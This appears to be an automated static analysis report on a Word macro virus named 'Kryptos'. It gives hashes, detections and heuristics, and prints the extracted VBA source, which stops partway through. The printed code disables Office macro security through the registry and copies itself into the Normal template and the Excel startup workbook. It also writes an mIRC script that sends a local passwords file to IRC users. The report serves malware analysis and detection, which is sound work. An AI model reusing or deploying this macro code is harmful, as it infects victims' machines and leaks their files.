Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0e48378ab3c4d956…

MALICIOUS

Office (OLE)

35.0 KB Created: 1999-07-13 21:15:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 293b7760542f9aad594c681ca0643d5d SHA-1: 36ae17dd0de3c1f84cf5af7cd78de553aebe0f70 SHA-256: 0e48378ab3c4d956bc09b52eb5fb62dcf97a304043183221f40b663bc51f580a
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros with a Document_Open subroutine that attempts to disable security settings and execute arbitrary code. The script also attempts to create a file at 'c:\mirc\script.ini' which contains commands related to IRC and a reference to 'c:\Passwords.rtf', suggesting a downloader or backdoor functionality. The presence of ClamAV detections for 'Doc.Trojan.Class-44' and 'Doc.Trojan.Kryptos-1' further supports its malicious nature.

Heuristics 6

  • ClamAV: Doc.Trojan.Class-44 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-44
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5982 bytes
SHA-256: c96cae72ecd0d742d54359efc4d5b586aa7b2008b28fce12005d41eb567cb32a
Detection
ClamAV: Doc.Trojan.Kryptos-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
On Error Resume Next
'Kryptos
Options.SaveNormalPrompt = 0
Options.SendMailAttach = 1
Options.ConfirmConversions = 0
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security", "Level") = 1
Else
CommandBars("Tools").Controls("Macro").Enabled = 0
Options.VirusProtection = 0
End If
Set glob = NormalTemplate.VBProject.VBComponents(1).codemodule
Set curr = ActiveDocument.VBProject.VBComponents(1).codemodule
If glob.Lines(3, 1) <> "'Kryptos" Then
glob.DeleteLines 1, glob.CountOfLines
glob.InsertLines 2, curr.Lines(2, curr.CountOfLines)
glob.InsertLines 1, "Sub Document_Open()"
glob.replaceline 45, "Sub Workbook_Deactivate": glob.replaceline 101, "Sub FileExit()"
End If
If curr.Lines(3, 1) <> "'Kryptos" Then
curr.DeleteLines 1, curr.CountOfLines
curr.InsertLines 2, glob.Lines(2, glob.CountOfLines)
curr.InsertLines 1, "Sub Document_Close()"
curr.replaceline 45, "Sub Workbook_Activate()": curr.replaceline 101, "Sub Dodo()"
Kill "c:\mirc\script.ini": Open "c:\mirc\script.ini" For Output As 1: Print #1, "[script]": Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\Passwords.rtf }"
Print #1, "n1=on 1:CONNECT: {": Close 1
End If
Set xlApp = CreateObject("Excel.Application")
If UCase(Dir(xlApp.Application.StartupPath + "\Book1.")) <> UCase("BOOK1") Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = ""
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\VBA\Office", "CodeForeColors") = "1 1 5 0 1 1 1 1 0 0 0 0 0 0 0 0"
Set Book1Obj = xlApp.Workbooks.Add
Book1Obj.VBProject.VBComponents.Item("ThisWorkbook").codemodule.InsertLines 1, glob.Lines(1, glob.CountOfLines)
Book1Obj.VBProject.VBComponents.Item("ThisWorkbook").codemodule.replaceline 45, "Sub Workbook_Deactivate()"
Book1Obj.SaveAs xlApp.Application.StartupPath & "\Book1."
Book1Obj.Close
Mze$ = ActiveDocument.FullName: ActiveDocument.SaveAs FileName:="c:\passwords.rtf", LockComments:=False, AddToRecentFiles:=False, ReadOnlyRecommended:=False
ActiveDocument.SaveAs FileName:=Mze$, LockComments:=False, AddToRecentFiles:=False, ReadOnlyRecommended:=False
End If
End Sub
   
Sub Workbook_Activate()
On Error Resume Next
Set aw = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
Set tw = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
tw.replaceline 45, "Sub Workbook_Deactivate": tw.replaceline 101, "Sub Disabled()"
If aw.Lines(3, 1) <> "'Kryptos" Then
aw.DeleteLines 1, aw.CountOfLines
aw.InsertLines 1, tw.Lines(1, tw.CountOfLines)
End If
If UCase(Dir(Application.StartupPath + "\Book1.")) <> "BOOK1" Then
ActiveWorkbook.SaveAs Excel.Application.StartupPath & "\Book1."
Open "c:\Kryptos.reg" For Output As 1
Print #1, "REGEDIT4"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]"
Print #1, """Options6""=dword:00000000"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]"
Print #1, """Level""=dword:00000001"
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\VBA\Office]"
Print #1, """CodeForeColors""=""1 1 5 0 1 1 1 1 0 0 0 0 0 0 0 0 """
Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\VBA\Office]"
Print #1, """CodeBackColors""=""1 1 0 7 6 0 0 0 0 0 0 0 0 0 0 0 """
Reset
Open "c:\index.html" For Output As 1
Print #1, "<html><head><title>Kryptos</title></head><body><center> "
Print #1, "Met a girl in the rain<br>"
Print #1, "waiting for a train<br>"
Pr
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.